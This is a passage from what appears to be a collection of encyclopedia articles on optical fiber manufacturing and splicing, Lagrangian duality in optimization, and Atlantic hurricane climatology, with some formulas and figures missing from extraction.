drawn into fibers at reasonably high temperatures and has a fairly broad glass transformation range. One other advantage is that fusion splicing and cleaving of silica fibers is relatively effective. Silica fiber also has high mechanical strength against both pulling and even bending, provided that the fiber is not too thick and that the surfaces have been well prepared during processing. Even simple cleaving of the ends of the fiber can provide nicely flat surfaces with acceptable optical quality. Silica is also relatively chemically inert. In particular, it is not hygroscopic (does not absorb water). Silica glass can be doped with various materials. One purpose of doping is to raise the refractive index (e.g. with germanium dioxide (GeO2) or aluminium oxide (Al2O3)) or to lower it (e.g. with fluorine or boron trioxide (B2O3)). Doping is also possible with laser-active ions (for example, rare-earth-doped fibers) in order to obtain active fibers to be used, for example, in fiber amplifiers or laser applications. Both the fiber core and cladding are typically doped, so that the entire assembly (core and cladding) is effectively the same compound (e.g. an aluminosilicate, germanosilicate, phosphosilicate or borosilicate glass). Particularly for active fibers, pure silica is usually not a very suitable host glass, because it exhibits a low solubility for rare-earth ions. This can lead to quenching effects due to the clustering of dopant ions. Aluminosilicates are much more effective in this respect. Silica fiber also exhibits a high threshold for optical damage. This property ensures a low tendency for laser-induced breakdown. This is important for fiber amplifiers when utilized for the amplification of short pulses. Because of these properties, silica fibers are the material of choice in many optical applications, such as communications (except for very short distances with plastic optical fiber), fiber lasers, fiber amplifiers, and fiber-optic sensors. Large efforts put forth in the development of various types of silica fibers have further increased the performance of such fibers over other materials. Fluoride glass Fluoride glass is a class of non-oxide optical quality glasses composed of fluorides of various metals. Because of the low viscosity of these glasses, it is very difficult to completely avoid crystallization while processing it through the glass transition (or drawing the fiber from the melt). Thus, although heavy metal fluoride glasses (HMFG) exhibit very low optical attenuation, they are not only difficult to manufacture, but are quite fragile, and have poor resistance to moisture and other environmental attacks. Their best attribute is that they lack the absorption band associated with the hydroxyl (OH) group (3,200–3,600 cm−1; i.e., 2,777–3,125 nm or 2.78–3.13 μm), which is present in nearly all oxide-based glasses. Such low losses were never realized in practice, and the fragility and high cost of fluoride fibers made them less than ideal as primary candidates. Fluoride fibers are used in mid-IR spectroscopy, fiber optic sensors, thermometry, and imaging. Fluoride fibers can be used for guided lightwave transmission in media such as YAG (yttrium aluminium garnet) lasers at 2.9 μm, as required for medical applications (e.g. ophthalmology and dentistry). An example of a heavy metal fluoride glass is the ZBLAN glass group, composed of zirconium, barium, lanthanum, aluminium, and sodium fluorides. Their main technological application is as optical waveguides in both planar and fiber forms. They are advantageous especially in the mid-infrared (2,000–5,000 nm) range. Phosphate glass Phosphate glass is a class of optical glasses composed of metaphosphates of various metals. Instead of the SiO4 tetrahedra observed in silicate glasses, the building block for this glass phosphorus pentoxide (P2O5), which crystallizes in at least four different forms. The most familiar polymorph is the cagelike structure of P4O10. Phosphate glasses can be advantageous over silica glasses for optical fibers with a high concentration of doping rare-earth ions. A mix of fluoride glass and phosphate glass is fluorophosphate glass. Chalcogenide glass The chalcogens—the elements in group 16 of the periodic table—particularly sulfur (S), selenium (Se) and tellurium (Te)—react with more electropositive elements, such as silver, to form chalcogenides. These are extremely versatile compounds, in that they can be crystalline or amorphous, metallic or semiconducting, and conductors of ions or electrons. chalcogenide glass can be used to make fibers for far infrared transmission. Process Preform Standard optical fibers are made by first constructing a large-diameter preform with a carefully controlled refractive index profile, and then pulling the preform to form the long, thin optical fiber. The preform is commonly made by three chemical vapor deposition methods: inside vapor deposition, outside vapor deposition, and vapor axial deposition. With inside vapor deposition, the preform starts as a hollow glass tube approximately long, which is placed horizontally and rotated slowly on a lathe. Gases such as silicon tetrachloride (SiCl4) or germanium tetrachloride (GeCl4) are injected with oxygen in the end of the tube. The gases are then heated by means of an external hydrogen burner, bringing the temperature of the gas up to 1,900 K (1,600 °C, 3,000 °F), where the tetrachlorides react with oxygen to produce silica or germanium dioxide particles. When the reaction conditions are chosen to allow this reaction to occur in the gas phase throughout the tube volume, in contrast to earlier techniques where the reaction occurred only on the glass surface, this technique is called modified chemical vapor deposition. The oxide particles then agglomerate to form large particle chains, which subsequently deposit on the walls of the tube as soot. The deposition is due to the large difference in temperature between the gas core and the wall causing the gas to push the particles outward in a process known as thermophoresis. The torch is then traversed up and down the length of the tube to deposit the material evenly. After the torch has reached the end of the tube, it is then brought back to the beginning of the tube and the deposited particles are then melted to form a solid layer. This process is repeated until a sufficient amount of material has been deposited. For each layer the composition can be modified by varying the gas composition, resulting in precise control of the finished fiber's optical properties. In outside vapor deposition or vapor axial deposition, the glass is formed by flame hydrolysis, a reaction in which silicon tetrachloride and germanium tetrachloride are oxidized by reaction with water in an oxyhydrogen flame. In outside vapor deposition, the glass is deposited onto a solid rod, which is removed before further processing. In vapor axial deposition, a short seed rod is used, and a porous preform, whose length is not limited by the size of the source rod, is built up on its end. The porous preform is consolidated into a transparent, solid preform by heating to about 1,800 K (1,500 °C, 2,800 °F). Typical communications fiber uses a circular preform. For some applications such as double-clad fibers another form is preferred. In fiber lasers based on double-clad fiber, an asymmetric shape improves the filling factor for laser pumping. Because of the surface tension, the shape is smoothed during the drawing process, and the shape of the resulting fiber does not reproduce the sharp edges of the preform. Nevertheless, careful polishing of the preform is important, since any defects of the preform surface affect the optical and mechanical properties of the resulting fiber. Drawing The preform, regardless of construction, is placed in a device known as a drawing tower, where the preform tip is heated and the optical fiber is pulled out as a string. The tension on the fiber can be controlled to maintain the desired fiber thickness. Cladding The light is guided down the core of the fiber by an optical cladding with a lower refractive index that traps light in the core through total internal reflection. For some types of fiber, the cladding is made of glass and is drawn along with the core from a preform with radially varying index of refraction. For other types of fiber, the cladding made of plastic and is applied like a coating (see below). Coatings The cladding is coated by a buffer, (not to be confused with an actual buffer tube), that protects it from moisture and physical damage. These coatings are UV-cured urethane acrylate composite or polyimide materials applied to the outside of the fiber during the drawing process. The coatings protect the very delicate strands of glass fiber—about the size of a human hair—and allow it to survive the rigors of manufacturing, proof testing, cabling, and installation. The buffer coating must be stripped off the fiber for termination or splicing. Today's glass optical fiber draw processes employ a dual-layer coating approach. An inner primary coating is designed to act as a shock absorber to minimize attenuation caused by microbending. An outer secondary coating protects the primary coating against mechanical damage and acts as a barrier to lateral forces, and may be colored to differentiate strands in bundled cable constructions. These fiber optic coating layers are applied during the fiber draw, at speeds approaching . Fiber optic coatings are applied using one of two methods: wet-on-dry and wet-on-wet. In wet-on-dry, the fiber passes through a primary coating application, which is then UV cured, then through the secondary coating application, which is subsequently cured. In wet-on-wet, the fiber passes through both the primary and secondary coating applications, then goes to UV curing. The thickness of the coating is taken into account when calculating the stress that the fiber experiences under different bend configurations. When a coated fiber is wrapped around a mandrel, the stress experienced by the fiber is given by where is the fiber's Young's modulus, is the diameter of the mandrel, is the diameter of the cladding and is the diameter of the coating. In a two-point bend configuration, a coated fiber is bent in a U-shape and placed between the grooves of two faceplates, which are brought together until the fiber breaks. The stress in the fiber in this configuration is given by where is the distance between the faceplates. The coefficient 1.198 is a geometric constant associated with this configuration. Fiber optic coatings protect the glass fibers from scratches that could lead to strength degradation. The combination of moisture and scratches accelerates the aging and deterioration of fiber strength. When fiber is subjected to low stresses over a long period, fiber fatigue can occur. Over time or in extreme conditions, these factors combine to cause microscopic flaws in the glass fiber to propagate, which can ultimately result in fiber failure. Three key characteristics of fiber optic waveguides can be affected by environmental conditions: strength, attenuation, and resistance to losses caused by microbending. External optical fiber cable jackets and buffer tubes protect glass optical fiber from environmental conditions that can affect the fiber's performance and long-term durability. On the inside, coatings ensure the reliability of the signal being carried and help minimize attenuation due to microbending. Cable construction In practical fibers, the cladding is usually coated with a tough resin and features an additional buffer layer, which may be further surrounded by a jacket layer, usually plastic. These layers add strength to the fiber but do not affect its optical properties. Rigid fiber assemblies sometimes put light-absorbing glass between the fibers, to prevent light that leaks out of one fiber from entering another. This reduces crosstalk between the fibers, or reduces flare in fiber bundle imaging applications. Multi-fiber cable usually uses colored buffers to identify each strand. Modern cables come in a wide variety of sheathings and armor, designed for applications such as direct burial in trenches, high voltage isolation, dual use as power lines, installation in conduit, lashing to aerial telephone poles, submarine installation, and insertion in paved streets. Some fiber optic cable versions are reinforced with aramid yarns or glass yarns as an intermediary strength member. In commercial terms, usage of the glass yarns are more cost-effective with no loss of mechanical durability. Glass yarns also protect the cable core against rodents and termites. Practical issues Installation Fiber cable can be very flexible, but traditional fiber's loss increases greatly if the fiber is bent with a radius smaller than around 30 mm. This creates a problem when the cable is bent around corners. Bendable fibers, targeted toward easier installation in home environments, have been standardized as ITU-T G.657. This type of fiber can be bent with a radius as low as 7.5 mm without adverse impact. Even more bendable fibers have been developed. Bendable fiber may also be resistant to fiber hacking, in which the signal in a fiber is surreptitiously monitored by bending the fiber and detecting the leakage. Another important feature of cable is cable's ability to withstand tension which determines how much force can be applied to the cable during installation. Termination and splicing Optical fibers are connected to terminal equipment by optical fiber connectors. These connectors are usually of a standard type such as FC, SC, ST, LC, MTRJ, MPO or SMA. Optical fibers may be connected by connectors typically on a patch panel, or permanently by splicing, that is, joining two fibers together to form a continuous optical waveguide. The generally accepted splicing method is fusion splicing, which melts the fiber ends together. For quicker fastening jobs, a mechanical splice is used. All splicing techniques involve installing an enclosure that protects the splice. Fusion splicing is done with a specialized instrument. The fiber ends are first stripped of their protective polymer coating (as well as the more sturdy outer jacket, if present). The ends are cleaved with a precision cleaver to make them perpendicular, and are placed into special holders in the fusion splicer. The splice is usually inspected via a magnified viewing screen to check the cleaves before and fusion after the splice. The splicer uses small motors to align the end faces together, and emits a small spark between electrodes at the gap to burn off dust and moisture. Then the splicer generates a larger spark that raises the temperature above the melting point of the glass, fusing the ends permanently. The location and energy of the spark is carefully controlled so that the molten core and cladding do not mix, and this minimizes optical loss. A splice loss estimate is measured by the splicer by directing light through the cladding on one side and measuring the light leaking from the cladding on the other side. A splice loss under 0.1 dB is typical. The complexity of this process makes fiber splicing much more difficult than splicing copper wire. Mechanical fiber splices are designed to be quicker and easier to install, but there is still the need for stripping, careful cleaning, and precision cleaving. The fiber ends are aligned and held together by a precision sleeve, often using a clear index-matching gel that enhances the transmission of light across the joint. Mechanical splices typically have a higher optical loss and are less robust than fusion splices, especially if the gel is used. Fibers are terminated in connectors that hold the fiber end precisely and securely. An optical fiber connector is a rigid cylindrical barrel surrounded by a sleeve that holds the barrel in its mating socket. The mating mechanism can be push and click, turn and latch (bayonet mount), or screw-in (threaded). The barrel is typically free to move within the sleeve and may have a key that prevents the barrel and fiber from rotating as the connectors are mated. A typical connector is installed by preparing the fiber end and inserting it into the rear of the connector body. Quick-set adhesive is usually used to hold the fiber securely, and a strain relief is secured to the rear. Once the adhesive sets, the fiber's end is polished. Various polish profiles are used, depending on the type of fiber and the application. The resulting signal strength loss is called gap loss. For single-mode fiber, fiber ends are typically polished with a slight curvature that makes the mated connectors touch only at their cores. This is called a physical contact (PC) polish. The curved surface may be polished at an angle, to make an angled physical contact (APC) connection. Such connections have higher loss than PC connections but greatly reduced back reflection because light that reflects from the angled surface leaks out of the fiber core. APC fiber ends have low back reflection even when disconnected. In the 1990s, the number of parts per connector, polishing of the fibers, and the need to oven-bake the epoxy in each connector made terminating fiber optic cables difficult. Today, connector types on the market offer easier, less labor-intensive ways of terminating cables. Some of the most popular connectors are pre-polished at the factory and include a gel inside the connector. A cleave is made at a required length, to get as close to the polished piece already inside the connector. The gel surrounds the point where the two pieces meet inside the connector for very little light loss. For the most demanding installations, factory pre-polished pigtails of sufficient length to reach the first fusion splice enclosure assures good performance and minimizes on-site labor. Free-space coupling It is often necessary to align an optical fiber with another optical fiber or with an optoelectronic device such as a light-emitting diode, a laser diode, or a modulator. This can involve either carefully aligning the fiber and placing it in contact with the device, or can use a lens to allow coupling over an air gap. Typically the size of the fiber mode is much larger than the size of the mode in a laser diode or a silicon optical chip. In this case, a tapered or lensed fiber is used to match the fiber mode field distribution to that of the other element. The lens on the end of the fiber can be formed using polishing, laser cutting or fusion splicing. In a laboratory environment, a bare fiber end is coupled using a fiber launch system, which uses a microscope objective lens to focus the light down to a fine point. A precision translation stage (micro-positioning table) is used to move the lens, fiber, or device to allow the coupling efficiency to be optimized. Fibers with a connector on the end make this process much simpler: the connector is simply plugged into a pre-aligned fiber-optic collimator, which contains a lens that is either accurately positioned to the fiber or is adjustable. To achieve the best injection efficiency into a single-mode fiber, the direction, position, size, and divergence of the beam must all be optimized. With good optimization, 70 to 90% coupling efficiency can be achieved. With properly polished single-mode fibers, the emitted beam has an almost perfect Gaussian shape—even in the far field—if a good lens is used. The lens needs to be large enough to support the full numerical aperture of the fiber, and must not introduce aberrations in the beam. Aspheric lenses are typically used. Fiber fuse At optical intensities above 2 megawatts per square centimeter, when a fiber is subjected to a shock or is otherwise suddenly damaged, a fiber fuse can occur. The reflection from the damage vaporizes the fiber immediately before the break, and this new defect remains reflective so that the damage propagates back toward the transmitter at 1–3 meters per second (4–11 km/h, 2–8 mph). The open fiber control system, which ensures laser eye safety in the event of a broken fiber, can also effectively halt propagation of the fiber fuse. In situations, such as undersea cables, where high power levels might be used without the need for open fiber control, a fiber fuse protection device at the transmitter can break the circuit to minimize damage. Chromatic dispersion The refractive index of fibers varies slightly with the frequency of light, and light sources are not perfectly monochromatic. Modulation of the light source to transmit a signal also slightly widens the frequency band of the transmitted light. This has the effect that, over long distances and at high modulation speeds, different portions of light can take different times to arrive at the receiver, ultimately making the signal impossible to discern. This problem can be overcome in several ways, including the use of extra repeaters and the use of a relatively short length of fiber that has the opposite refractive index gradient.
Technology
Basics_9
null
3372717
https://en.wikipedia.org/wiki/Duality%20%28optimization%29
Duality (optimization)
In mathematical optimization theory, duality or the duality principle is the principle that optimization problems may be viewed from either of two perspectives, the primal problem or the dual problem. If the primal is a minimization problem then the dual is a maximization problem (and vice versa). Any feasible solution to the primal (minimization) problem is at least as large as any feasible solution to the dual (maximization) problem. Therefore, the solution to the primal is an upper bound to the solution of the dual, and the solution of the dual is a lower bound to the solution of the primal. This fact is called weak duality. In general, the optimal values of the primal and dual problems need not be equal. Their difference is called the duality gap. For convex optimization problems, the duality gap is zero under a constraint qualification condition. This fact is called strong duality. Dual problem Usually the term "dual problem" refers to the Lagrangian dual problem but other dual problems are used – for example, the Wolfe dual problem and the Fenchel dual problem. The Lagrangian dual problem is obtained by forming the Lagrangian of a minimization problem by using nonnegative Lagrange multipliers to add the constraints to the objective function, and then solving for the primal variable values that minimize the original objective function. This solution gives the primal variables as functions of the Lagrange multipliers, which are called dual variables, so that the new problem is to maximize the objective function with respect to the dual variables under the derived constraints on the dual variables (including at least the nonnegativity constraints). In general given two dual pairs of separated locally convex spaces and and the function , we can define the primal problem as finding such that In other words, if exists, is the minimum of the function and the infimum (greatest lower bound) of the function is attained. If there are constraint conditions, these can be built into the function by letting where is a suitable function on that has a minimum 0 on the constraints, and for which one can prove that . The latter condition is trivially, but not always conveniently, satisfied for the characteristic function (i.e. for satisfying the constraints and otherwise). Then extend to a perturbation function such that . The duality gap is the difference of the right and left hand sides of the inequality where is the convex conjugate in both variables and denotes the supremum (least upper bound). Duality gap The duality gap is the difference between the values of any primal solutions and any dual solutions. If is the optimal dual value and is the optimal primal value, then the duality gap is equal to . This value is always greater than or equal to 0 (for minimization problems). The duality gap is zero if and only if strong duality holds. Otherwise the gap is strictly positive and weak duality holds. In computational optimization, another "duality gap" is often reported, which is the difference in value between any dual solution and the value of a feasible but suboptimal iterate for the primal problem. This alternative "duality gap" quantifies the discrepancy between the value of a current feasible but suboptimal iterate for the primal problem and the value of the dual problem; the value of the dual problem is, under regularity conditions, equal to the value of the convex relaxation of the primal problem: The convex relaxation is the problem arising replacing a non-convex feasible set with its closed convex hull and with replacing a non-convex function with its convex closure, that is the function that has the epigraph that is the closed convex hull of the original primal objective function. Linear case Linear programming problems are optimization problems in which the objective function and the constraints are all linear. In the primal problem, the objective function is a linear combination of n variables. There are m constraints, each of which places an upper bound on a linear combination of the n variables. The goal is to maximize the value of the objective function subject to the constraints. A solution is a vector (a list) of n values that achieves the maximum value for the objective function. In the dual problem, the objective function is a linear combination of the m values that are the limits in the m constraints from the primal problem. There are n dual constraints, each of which places a lower bound on a linear combination of m dual variables. Relationship between the primal problem and the dual problem In the linear case, in the primal problem, from each sub-optimal point that satisfies all the constraints, there is a direction or subspace of directions to move that increases the objective function. Moving in any such direction is said to remove slack between the candidate solution and one or more constraints. An infeasible value of the candidate solution is one that exceeds one or more of the constraints. In the dual problem, the dual vector multiplies the constraints that determine the positions of the constraints in the primal. Varying the dual vector in the dual problem is equivalent to revising the upper bounds in the primal problem. The lowest upper bound is sought. That is, the dual vector is minimized in order to remove slack between the candidate positions of the constraints and the actual optimum. An infeasible value of the dual vector is one that is too low. It sets the candidate positions of one or more of the constraints in a position that excludes the actual optimum. This intuition is made formal by the equations in Linear programming: Duality. Nonlinear case In nonlinear programming, the constraints are not necessarily linear. Nonetheless, many of the same principles apply. To ensure that the global maximum of a non-linear problem can be identified easily, the problem formulation often requires that the functions be convex and have compact lower level sets. This is the significance of the Karush–Kuhn–Tucker conditions. They provide necessary conditions for identifying local optima of non-linear programming problems. There are additional conditions (constraint qualifications) that are necessary so that it will be possible to define the direction to an optimal solution. An optimal solution is one that is a local optimum, but possibly not a global optimum. Lagrange duality Motivation. Suppose we want to solve the following nonlinear programming problem:The problem has constraints; we would like to convert it to a program without constraints. Theoretically, it is possible to do it by minimizing the function J(x), defined aswhere I is an infinite step function: I[u]=0 if u≤0, and I[u]=∞ otherwise. But J(x) is hard to solve as it is not continuous. It is possible to "approximate" I[u] by λu, where λ is a positive constant. This yields a function known as the lagrangian:Note that, for every x, .Proof: If x satisfies all constraints fi(x)≤0, then L(x,λ) is maximized when taking λ=0, and its value is then f(x); If x violates some constraint, fi(x)>0 for some i, then L(x,λ)→∞ when λi→∞. Therefore, the original problem is equivalent to:.By reversing the order of min and max, we get:.The dual function is the inner problem in the above formula:.The Lagrangian dual program is the program of maximizing g:.The optimal solution to the dual program is a lower bound for the optimal solution of the original (primal) program; this is the weak duality principle. If the primal problem is convex and bounded from below, and there exists a point in which all nonlinear constraints are strictly satisfied (Slater's condition), then the optimal solution to the dual program equals the optimal solution of the primal program; this is the strong duality principle. In this case, we can solve the primal program by finding an optimal solution λ* to the dual program, and then solving:.Note that, to use either the weak or the strong duality principle, we need a way to compute g(λ). In general this may be hard, as we need to solve a different minimization problem for every λ. But for some classes of functions, it is possible to get an explicit formula for g(). Solving the primal and dual programs together is often easier than solving only one of them. Examples are linear programming and quadratic programming. A better and more general approach to duality is provided by Fenchel's duality theorem. Another condition in which the min-max and max-min are equal is when the Lagrangian has a saddle point: (x∗, λ∗) is a saddle point of the Lagrange function L if and only if x∗ is an optimal solution to the primal, λ∗ is an optimal solution to the dual, and the optimal values in the indicated problems are equal to each other. The strong Lagrange principle Given a nonlinear programming problem in standard form with the domain having non-empty interior, the Lagrangian function is defined as The vectors and are called the dual variables or Lagrange multiplier vectors associated with the problem. The Lagrange dual function is defined as The dual function g is concave, even when the initial problem is not convex, because it is a point-wise infimum of affine functions. The dual function yields lower bounds on the optimal value of the initial problem; for any and any we have . If a constraint qualification such as Slater's condition holds and the original problem is convex, then we have strong duality, i.e. . Convex problems For a convex minimization problem with inequality constraints, the Lagrangian dual problem is where the objective function is the Lagrange dual function. Provided that the functions and are continuously differentiable, the infimum occurs where the gradient is equal to zero. The problem is called the Wolfe dual problem. This problem may be difficult to deal with computationally, because the objective function is not concave in the joint variables . Also, the equality constraint is nonlinear in general, so the Wolfe dual problem is typically a nonconvex optimization problem. In any case, weak duality holds. History According to George Dantzig, the duality theorem for linear optimization was conjectured by John von Neumann immediately after Dantzig presented the linear programming problem. Von Neumann noted that he was using information from his game theory, and conjectured that two person zero sum matrix game was equivalent to linear programming. Rigorous proofs were first published in 1948 by Albert W. Tucker and his group. (Dantzig's foreword to Nering and Tucker, 1993) Applications In support vector machines (SVMs), formulating the primal problem of SVMs as the dual problem can be used to implement the Kernel trick, but the latter has higher time complexity in the historical cases.
Mathematics
Optimization
null
3373620
https://en.wikipedia.org/wiki/Atlantic%20hurricane
Atlantic hurricane
An Atlantic hurricane is a type of tropical cyclone that forms in the Atlantic Ocean primarily between June and November. The terms "hurricane", "typhoon", and "tropical cyclone" can be used interchangeably to describe this weather phenomenon. These storms are continuously rotating around a low pressure center, which causes stormy weather across a large area, which is not limited to just the eye of the storm. They are organized systems of clouds and thunderstorms that originate over tropical or subtropical waters and have closed low-level circulation, and should not be confused with tornadoes, which are just another type of cyclone. They form over low pressure systems. In the North Atlantic and the Eastern Pacific, the term "hurricane" is used, whereas "typhoon" is used in the Western Pacific near Asia. The more general term "cyclone" is used in the rest of the ocean basins, namely the South Pacific and Indian Ocean. Tropical cyclones can be categorized by intensity. Tropical storms have one-minute maximum sustained winds of at least 39 mph (34 knots, 17 m/s, 63 km/h), while hurricanes must achieve the target of one-minute maximum sustained winds that is 75 mph or more (64 knots, 33 m/s, 119 km/h). Most North Atlantic tropical cyclones form between August 1 and November 30, when most tropical disturbances occur. The United States National Hurricane Center (NHC) monitors tropical weather systems for the North Atlantic Basin and issues reports, watches, and warnings. It is considered to be one of the Regional Specialized Meteorological Centers for tropical cyclones, as defined by the World Meteorological Organization. Until the mid-1900s, storms were named arbitrarily. From that period on, they were exclusively given feminine names, until 1979, when storms began being given both male and female names. The practice of naming storms from a predetermined list began in 1953. Since storm names may be used repeatedly, hurricanes that result in significant damage or casualties may have their names retired from the list at the request of the affected nations to prevent confusion. On average, 14 named storms occur each season in the North Atlantic basin, with 7 becoming hurricanes and 3 becoming major hurricanes (Category 3 or greater). The climatological peak of activity is typically around mid-September. In April 2004, Catarina became the first storm of hurricane strength to be recorded in the South Atlantic Ocean. Since 2011, the Brazilian Navy Hydrographic Center has started to use the same scale as the North Atlantic Ocean for tropical cyclones in the South Atlantic Ocean and assign names to those that reach . Steering factors Tropical cyclones are steered by flows surrounding them throughout the depth of the troposphere (the atmospheric layer ranging from the ground to about high). Neil Frank, former director of the United States National Hurricane Center, used analogies such as "a leaf carried along in a stream" or a "brick moving through a river of air" to describe the way atmospheric flow affects the path of a hurricane across the ocean. Specifically, air flow around high pressure systems and toward low-pressure areas influences hurricane tracks. In the tropical latitudes, tropical storms and hurricanes generally move westward with a slight tendency toward the north due to being under the influence of the subtropical ridge, a high-pressure system that usually extends east–west across the subtropics. South of the subtropical ridge, surface easterly winds (blowing from east to west) prevail. If the subtropical ridge is weakened by an upper trough, a tropical cyclone may turn poleward (north) and then recurve (curve back toward the northeast into the main belt of the westerlies). Poleward of the subtropical ridge, westerly winds prevail and generally move tropical cyclones that reach northern latitudes toward the east. The westerlies also move extratropical cyclones and their cold and warm fronts from west to east. Intensity The intensity of a tropical cyclone is generally determined by either a storm's maximum sustained winds or its lowest barometric pressure. The following table lists the most intense Atlantic hurricanes in terms of their lowest barometric pressure. In terms of wind speed, Hurricane Allen (in 1980) was the strongest Atlantic tropical cyclone on record, with maximum sustained winds of . However, these measurements are suspect, since instrumentation used to document wind speeds at the time was likely to succumb to winds of such intensity. Nonetheless, their central pressures are low enough to rank them among the strongest recorded Atlantic hurricanes. Owing to their intensity, the strongest Atlantic hurricanes have all attained Category 5 classification. Hurricane Opal, the strongest Category 4 hurricane recorded, intensified to reach a minimum pressure of , a pressure typical of Category 5 hurricanes. Hurricane Wilma became the strongest Atlantic hurricane recorded after reaching an intensity of in October 2005; this also made Wilma the strongest tropical cyclone worldwide outside of the Pacific, where seven tropical cyclones have been recorded to intensify to lower pressures; one of these hurricanes was Hurricane Patricia in 2015 in the east Pacific; it had a pressure reading of 872 mbar. Preceding Wilma is Hurricane Gilbert, which held the record for the most intense Atlantic hurricane for 17 years. The 1935 Labor Day hurricane, with a pressure of 892 mbar (hPa; ), is the third strongest Atlantic hurricane and the strongest documented tropical cyclone before 1950. Since the measurements taken during Wilma and Gilbert were documented using dropsonde, this pressure remains the lowest measured over land. Hurricane Rita is the fourth strongest Atlantic hurricane in terms of barometric pressure and one of three tropical cyclones from 2005 on the list, with the others being Wilma and Katrina at first and seventh respectively. However, with a barometric pressure of , Rita is the strongest tropical cyclone ever recorded in the Gulf of Mexico. Hurricanes Mitch and Dean share intensities for the ninth strongest Atlantic hurricane at . The tenth place for the most intense Atlantic tropical cyclone is Hurricane Maria, which is listed to have deepened to a pressure as low as . Many of the strongest recorded tropical cyclones weakened before their eventual landfall or demise. However, three of the storms remained intense enough at landfall to be considered some of the strongest, most powerful land falling hurricanes – three of the ten hurricanes on the list constitute the three most intense Atlantic landfalls in recorded history. The 1935 Labor Day hurricane made landfall at peak intensity, making it the most intense Atlantic landfall. Though it weakened slightly before its eventual landfall on the Yucatán Peninsula. Hurricane Gilbert maintained a pressure of 900 hPa at landfall, as did Camille, making their landfalls tied as the second strongest. Hurricane Dean also made landfall on the peninsula, but it did so at peak intensity and with a higher barometric pressure; its landfall marked the fourth strongest in Atlantic hurricane history. Climatology Climatology serves to characterize the general properties of an average season and can be used for making forecasts. Most storms form from tropical waves in warm waters several hundred miles north of the equator near the Intertropical Convergence Zone from tropical waves. The Coriolis force is usually too weak to initiate sufficient rotation near the equator. Storms frequently form in the waters of the Gulf of Mexico, the Caribbean, the tropical Atlantic Ocean, and in areas as far east as the Cape Verde Islands, creating Cape Verde-type hurricanes. Systems may also strengthen over the Gulf Stream off the coast of the eastern United States wherever water temperatures exceed . Although most storms are found within tropical latitudes, occasionally storms will form further north and east due to disturbances other than tropical waves such as cold fronts and upper-level lows. These are known as baroclinically induced tropical cyclones. There is a strong correlation between the amount of Atlantic hurricane activity in the tropics and the presence of an El Niño or La Niña in the Pacific Ocean. El Niño events increase the wind shear over the Atlantic, producing a less favorable environment for formation and decreasing tropical activity in the Atlantic basin. Conversely, La Niña causes an increase in activity due to a decrease in wind shear. According to the Azores High hypothesis by Kam-biu Liu, an anti-phase pattern is expected to exist between the Gulf of Mexico coast and the North American Atlantic coast. During the quiescent periods (3000–1400 BC, and 1000 AD to present), a more northeasterly position of the Azores High would result in more hurricanes being steered toward the Atlantic coast. During the hyperactive period (1400 BC to 1000 AD), more hurricanes were steered towards the Gulf coast as the Azores High was shifted to a more southwesterly position near the Caribbean. Such a displacement of the Azores High is consistent with paleoclimatic evidence that shows an abrupt onset of a drier climate in Haiti around 3200 14C years BP, and a change towards more humid conditions in the Great Plains during the late-Holocene as more moisture was pumped up the Mississippi Valley through the Gulf coast. Preliminary data from the northern Atlantic coast seem to support the Azores High hypothesis. A 3000-year proxy record from a coastal lake in Cape Cod suggests that hurricane activity has increased significantly during the past 500–1000 years, just as the Gulf coast was amid a quiescent period of the last millennium. Seasonal variation Approximately 97 percent of tropical cyclones that form in the North Atlantic develop between June 1 and November 30, which delimit the modern-day Atlantic hurricane season. Though the beginning of the annual hurricane season has historically remained the same, the official end of the hurricane season has shifted from its initial date of October 31. Regardless, on an average of every few years, a tropical cyclone develops outside the limits of the season. As of September 2021, there have been 88 tropical cyclones in the off-season, with the most recent being Tropical Storm Ana in May 2021. The first tropical cyclone of the 1938 Atlantic hurricane season, which formed on January 3, became the earliest-forming tropical storm, as post-hurricane reanalysis concluded about the storm in December 2012. Hurricane Able in 1951 was initially thought to be the earliest forming major hurricane – a tropical cyclone with winds exceeding  – however, following post-storm analysis, it was determined that Able only reached Category 1 strength, which made Hurricane Alma of 1966 the new record holder, as it became a major hurricane on June 8. Though it developed within the bounds of the Atlantic hurricane season, Hurricane Audrey in 1957 became the earliest developing Category 4 hurricane on record after it reached 115 mph on June 27. However, reanalysis from 1956 to 1960 by NOAA downgraded Audrey to a Category 3, making Hurricane Dennis of 2005 the earliest Category 4 on record on July 8, 2005. The earliest-forming Category 5 hurricane, Beryl, reached the highest intensity on the Saffir–Simpson hurricane wind scale on July 2, 2024. Though the official end of the Atlantic hurricane season occurs on November 30, the dates of October 31 and November 15 have also historically marked the end date for the hurricane season. December, the only month of the year after the hurricane season, has featured the cyclogenesis of fourteen tropical cyclones. Tropical Storm Zeta in 2005 was the latest tropical cyclone to attain tropical storm intensity, as it did so on December 30. However, the second Hurricane Alice in 1954 was the latest forming tropical cyclone to attain hurricane intensity. Both Zeta and Alice were the only two storms to exist in two calendar years – the former from 1954 to 1955 and the latter from 2005 to 2006. No storms have been recorded to exceed Category 1 hurricane intensity in December. In 1999, Hurricane Lenny reached Category 4 intensity on November 17 as it took an unprecedented west-to-east track across the Caribbean; its intensity made it the latest developing Category 4 hurricane, though this was well within the bounds of the hurricane season. Hurricane Hattie (October 27 – November 1, 1961) was initially thought to have been the latest forming Category 5 hurricane ever documented, as was 2020's Hurricane Iota, but both were later downgraded during subsequent reanalysis. Reanalysis also indicated that a hurricane in 1932 reached Category 5 intensity later than any other hurricane on record in the Atlantic. June The beginning of the hurricane season is most closely related to the timing of increases in sea surface temperatures, convective instability, and other thermodynamic factors. Although June marks the beginning of the hurricane season, little activity usually occurs, with an average of one tropical cyclone every two years. During this early period in the hurricane season, tropical systems usually form in the Gulf of Mexico or off the east coast of the United States. Since 1851, a total of 81 tropical storms and hurricanes formed in June. During this period, two of these systems developed in the deep tropics east of the Lesser Antilles. Since 1870, three major hurricanes have formed during June, such as Hurricane Audrey in 1957. Audrey attained an intensity greater than that of any Atlantic tropical cyclone during June or July until Hurricanes Dennis and Emily of 2005. The easternmost forming storm during June, Tropical Storm Bret in 2023, formed at 40.3°W. July Little tropical activity occurs during July, with only one tropical cyclone usually forming. From 1944 to 1996, the first tropical storm occurred by 11 July in half of the seasons, and a second formed by 8 August. Formation usually occurs in the eastern Caribbean around the Lesser Antilles, in the northern and eastern parts of the Gulf of Mexico, in the vicinity of the northern Bahamas, and off the coast of The Carolinas and Virginia over the Gulf Stream. Storms travel westward through the Caribbean and then either move towards the north and curve near the eastern coast of the United States or stay on a north-westward track and enter the Gulf of Mexico. Since 1851, a total of 105 tropical storms have formed during July. Since 1870, ten of these storms reached major hurricane intensity; out of them, only Hurricane 